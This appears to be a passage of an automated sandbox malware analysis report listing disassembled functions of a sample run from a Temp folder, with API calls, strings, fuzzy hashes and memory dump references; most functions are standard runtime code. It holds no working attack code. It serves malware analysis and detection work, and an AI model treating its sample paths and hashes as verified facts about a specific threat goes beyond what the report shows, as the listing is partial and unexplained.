Instruction ID: 315e15a75b7a934883fb73af53b600e8716b14a97590f90f8be1c7313cf8858b
Opcode Fuzzy Hash: 7589c1420c2d5979131227e162199694b1fa80644d7f377756f1c37c2222f5d1
Instruction Fuzzy Hash: 7C41B374A002589BCF10DF68D884ADE7BF5EF46324F5484E5E8149B392D731AD92CB90

Function 00B13269 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B1326F
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00B1327D
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00B1328E

Strings

GetTempPath2W, xrefs: 00B13283
GetSystemTimePreciseAsFileTime, xrefs: 00B13277
kernel32.dll, xrefs: 00B1326A

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 8dd6583203e8e311946f267a9b9ef2b96c750cab1c4c9a71ee11b5118ff80564
Instruction ID: 1c50ae1ef50c245c49ea2e91e28d1291b93cca56e57b6402717694eb3bd0aba2
Opcode Fuzzy Hash: 8dd6583203e8e311946f267a9b9ef2b96c750cab1c4c9a71ee11b5118ff80564
Instruction Fuzzy Hash: BBD09275692660AF8320AFB1BC0D89A3FE8EB09B1130185A2F909D3264EF7045028FE5

Function 00B18639 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B18630,00B1443B,00B13B4A), ref: 00B18647
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B18655
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B1866E
SetLastError.KERNEL32(00000000,00B18630,00B1443B,00B13B4A), ref: 00B186C0

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ab29f3d4a3ba9f68bfffb7d759a7e7f4c1eae54bd32b476b1a9817ed0d6abe7a
Instruction ID: d8363a17dbd3d750aed73102b758c19208caeae4dd41be23ecb0ced7b463f0b7
Opcode Fuzzy Hash: ab29f3d4a3ba9f68bfffb7d759a7e7f4c1eae54bd32b476b1a9817ed0d6abe7a
Instruction Fuzzy Hash: A701A2332192125EAA7527B5BCC5AEB2BC4FB0577876003B9F934861F5EF52CC829180

Function 00B18EC9 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B18FE8
CallUnexpected.LIBVCRUNTIME ref: 00B19261

Strings

csm, xrefs: 00B18F73
csm, xrefs: 00B18F06
csm, xrefs: 00B1901F

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: cd96c2f9283291fc7b57d0d3f520af9712ccd32fb4d45168482d8a4e75e93d83
Instruction ID: 508ec2357aeb0108cf1f45d738fa32b23a6de3e055025955a67dff0afdeb1d42
Opcode Fuzzy Hash: cd96c2f9283291fc7b57d0d3f520af9712ccd32fb4d45168482d8a4e75e93d83
Instruction Fuzzy Hash: 98B15731800249EFCF29DFA4D8959EEB7F5FF08310F9445AAE8156B202D731DAA1CB91

Function 00B1DC9B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe, xrefs: 00B1DCB7

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID:
String ID: C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe
API String ID: 0-4038915324
Opcode ID: 454a032327e343444f217d8ec962e07362448de3387814461d173a83e1c55cd6
Instruction ID: 56a90f3ad64f289af17c413b3884da5bf53e565b04293bc9574fc1c36006c10d
Opcode Fuzzy Hash: 454a032327e343444f217d8ec962e07362448de3387814461d173a83e1c55cd6
Instruction Fuzzy Hash: 3221A131200205AFCB20AF61EC81DEA7BF8EF123647904AA5F919D7251DB30EC80D790

Function 00B1720B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2026DCDA,?,?,00000000,00B25CA3,000000FF,?,00B172CC,00000002,?,00B17368,00B184AD), ref: 00B17240
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B17252
FreeLibrary.KERNEL32(00000000,?,?,00000000,00B25CA3,000000FF,?,00B172CC,00000002,?,00B17368,00B184AD), ref: 00B17274

Strings

mscoree.dll, xrefs: 00B17239
CorExitProcess, xrefs: 00B1724A

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c66bfe44af5a89f6acfd01053681e21b26c4d048add293df069a2c69c4a15bfb
Instruction ID: 0df7562c05a6b6c2921d1c60efc5b50f4a31ac0fc916f84c3b515b29f0cca3c9
Opcode Fuzzy Hash: c66bfe44af5a89f6acfd01053681e21b26c4d048add293df069a2c69c4a15bfb
Instruction Fuzzy Hash: CF01A231944A29AFCB218F54DC09BAEBBF8FB04B15F004665F815A32A0DF749901CBC0

Function 00B1F1A5 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B1F22A
__alloca_probe_16.LIBCMT ref: 00B1F2F3
__freea.LIBCMT ref: 00B1F35A

Part of subcall function 00B1B8D6: RtlAllocateHeap.NTDLL(00000000,00B1AB77,?,?,00B1AB77,00000220,?,00000000,?), ref: 00B1B908

__freea.LIBCMT ref: 00B1F36D
__freea.LIBCMT ref: 00B1F37A

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 6a04e01f34c0a38118c1dc86a2ba4ce0a7f9b5ca5c01f7ebaea02c03e646351d
Instruction ID: fbb224af140763bbe108b12d9f1a941d4631ce010ebb447d3428c5db3b6e1010
Opcode Fuzzy Hash: 6a04e01f34c0a38118c1dc86a2ba4ce0a7f9b5ca5c01f7ebaea02c03e646351d
Instruction Fuzzy Hash: E251AE72600247ABEF215FA0EC81EFB7AE9EF44750B9902B9FD14D6151EB30DD90C664

Function 00B130C1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B130D5
AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00B25C4C,000000FF,?,00B1211F), ref: 00B130F4
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00B25C4C,000000FF,?,00B1211F), ref: 00B13122
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00B25C4C,000000FF,?,00B1211F), ref: 00B1317D
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00B25C4C,000000FF,?,00B1211F), ref: 00B13194

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: 620d3cddb03037b6e95e54c7512f2a452b1f9a98c06e18f921d8c5626d9bfab1
Instruction ID: d8c83420e454d4258033ed561c9f682e2472ee07fc373e4fe2adb0f735ea1670
Opcode Fuzzy Hash: 620d3cddb03037b6e95e54c7512f2a452b1f9a98c06e18f921d8c5626d9bfab1
Instruction Fuzzy Hash: 3F415C31600606FFCB24CF65C4859EAB7F5FF05B11BA049A9D45AE7540EB30EAE5CB60

Function 00B11C40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registrywindowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00B11C9D
RegisterClassW.USER32(?), ref: 00B11CB2
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B11CDB

Strings

Christmas Balls, xrefs: 00B11CA7

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ClassHandleMessageModuleRegister
String ID: Christmas Balls
API String ID: 1585107554-3481381322
Opcode ID: 1f220c1a307c321919646d17a2dfa4fac614ad097cb6991864f4a7c349319246
Instruction ID: 7b56bbb6cb777b27eec364f0c4daf6284edb1cf84fbabe5c5a1cc54333054fb2
Opcode Fuzzy Hash: 1f220c1a307c321919646d17a2dfa4fac614ad097cb6991864f4a7c349319246
Instruction Fuzzy Hash: C0218CB2C403898BDB10CFA0DC45BEEBBB4FF59714F501229E508B6240EB7426D1CB94

Function 00B1EEE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B1EF82,00000000,?,00B2F760,?,?,?,00B1EEB9,00000004,InitializeCriticalSectionEx,00B278B0,00B278B8), ref: 00B1EEF3
GetLastError.KERNEL32(?,00B1EF82,00000000,?,00B2F760,?,?,?,00B1EEB9,00000004,InitializeCriticalSectionEx,00B278B0,00B278B8,00000000,?,00B1951C), ref: 00B1EEFD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B1EF25

Strings

api-ms-, xrefs: 00B1EF0A

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 01802bb923d5f887d1acd22a28c22ff0778e406c4c28e886e43d847e90c9a004
Instruction ID: 6598dfabf05b406c7e72b02edd1eb66faff64ade995855c0c95dd5675c6e8bde
Opcode Fuzzy Hash: 01802bb923d5f887d1acd22a28c22ff0778e406c4c28e886e43d847e90c9a004
Instruction Fuzzy Hash: EEE04831684209B7FB211F60EC06F6C3F95EB04B50F504070FD0CE50E1DB62F9929585

Function 00B1F86C Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(2026DCDA,00000000,00000000,?), ref: 00B1F8CF

Part of subcall function 00B1E356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B1F350,?,00000000,-00000008), ref: 00B1E3B7

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B1FB21
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B1FB67
GetLastError.KERNEL32 ref: 00B1FC0A

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 34a05957b0cef9eae4cd25ac69bf93957903bb1598c851f91520e9b9ea1203f1
Instruction ID: 3e6f2678459e2db92d9d1931ae45d35f8f4b5a18d2a7643d1bc68fc8a1d30483
Opcode Fuzzy Hash: 34a05957b0cef9eae4cd25ac69bf93957903bb1598c851f91520e9b9ea1203f1
Instruction Fuzzy Hash: 0BD17DB5D04249EFCB15CFA8D8809EDBBF5FF09310F6445AAE456EB351D630A982CB50

Function 00B18BF0 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B18CB7
___AdjustPointer.LIBCMT ref: 00B18CDA
___AdjustPointer.LIBCMT ref: 00B18D76

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: a89e09a429225e8b0141be03cab5d14403a58d931228340384d2343a719f996a
Instruction ID: bd3c02fb62f0c706f11673f97262c68f5c37440decb1f7b1ad93afcbbabc4b12
Opcode Fuzzy Hash: a89e09a429225e8b0141be03cab5d14403a58d931228340384d2343a719f996a
Instruction Fuzzy Hash: 2C518D71601306AFDB299F14E841BEA77E5FF24711FA445ADE8055B2D1EB31ACC1C7A0

Function 00B1D6FF Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00B1E356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B1F350,?,00000000,-00000008), ref: 00B1E3B7

GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00B1DAA5,?,?,?,00000000), ref: 00B1D763
__dosmaperr.LIBCMT ref: 00B1D76A
GetLastError.KERNEL32(00000000,00B1DAA5,?,?,00000000,?,?,?,00000000,00000000,?,00B1DAA5,?,?,?,00000000), ref: 00B1D7A4
__dosmaperr.LIBCMT ref: 00B1D7AB

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 073c74da0e7c31f3fd109a94c701d96729198efafad134e02a9076be3b99a6a2
Instruction ID: cec879a58460ad36c95c2be9adee011ed07a6824232c9d13adbccd7ad4f737ea
Opcode Fuzzy Hash: 073c74da0e7c31f3fd109a94c701d96729198efafad134e02a9076be3b99a6a2
Instruction Fuzzy Hash: EC219F72600215AFDB21AF65DCC18ABB7E9EF4136479086A9F959D7281DB30ECC09B90

Function 00B1E452 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B1E45A

Part of subcall function 00B1E356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B1F350,?,00000000,-00000008), ref: 00B1E3B7

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B1E492
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B1E4B2

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 2e1921dcbb8a55c1a3b1b5d1b51920b039dfe180bbb33d403da35ccbf1187d5c
Instruction ID: 7cdb8a4e6a04650418dfecfd1c8e474fca0f1c353a1a48004fd76b22e283e493
Opcode Fuzzy Hash: 2e1921dcbb8a55c1a3b1b5d1b51920b039dfe180bbb33d403da35ccbf1187d5c
Instruction Fuzzy Hash: 5911C0E25016197F672227B5ACC9CEF2EECEE853A479005A5FC15D2201EE24DE8291B5

Function 00B2429C Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00B2311E,00000000,00000001,?,?,?,00B1FC5E,?,00000000,00000000), ref: 00B242B3
GetLastError.KERNEL32(?,00B2311E,00000000,00000001,?,?,?,00B1FC5E,?,00000000,00000000,?,?,?,00B1F5A4,?), ref: 00B242BF

Part of subcall function 00B24310: CloseHandle.KERNEL32(FFFFFFFE,00B242CF,?,00B2311E,00000000,00000001,?,?,?,00B1FC5E,?,00000000,00000000,?,?), ref: 00B24320

___initconout.LIBCMT ref: 00B242CF

Part of subcall function 00B242F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B2428D,00B2310B,?,?,00B1FC5E,?,00000000,00000000,?), ref: 00B24304

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00B2311E,00000000,00000001,?,?,?,00B1FC5E,?,00000000,00000000,?), ref: 00B242E4

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 581f5fb79f8524f69fe6e9d995adf8b0400b3d3811c968924402f25331470ebd
Instruction ID: 00efde817924b04dfba6afdd1217adb5a93ff0d04ead6326649c0313dd3f82a3
Opcode Fuzzy Hash: 581f5fb79f8524f69fe6e9d995adf8b0400b3d3811c968924402f25331470ebd
Instruction Fuzzy Hash: 4FF01C37100124FBCF221FE2EC0499D3F66FF493A0B004560FA1C96930CB3298219B90

Function 00B138D1 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B138E3
GetCurrentThreadId.KERNEL32 ref: 00B138F2
GetCurrentProcessId.KERNEL32 ref: 00B138FB
QueryPerformanceCounter.KERNEL32(?), ref: 00B13908

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 4c681c7e460775345d03439f1cc3c1eb5d5c15b82708270dc8827ec9e16e988b
Instruction ID: 71810154346d2df2333d41777ea4b56398f3e64efe5996ff00ad9d414cc9a162
Opcode Fuzzy Hash: 4c681c7e460775345d03439f1cc3c1eb5d5c15b82708270dc8827ec9e16e988b
Instruction Fuzzy Hash: 85F05F75D1020DEBCB10DFB4D94999EBBF4EF1C210B9145A6A416E7110EA30AB459B91

Function 00B192ED Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

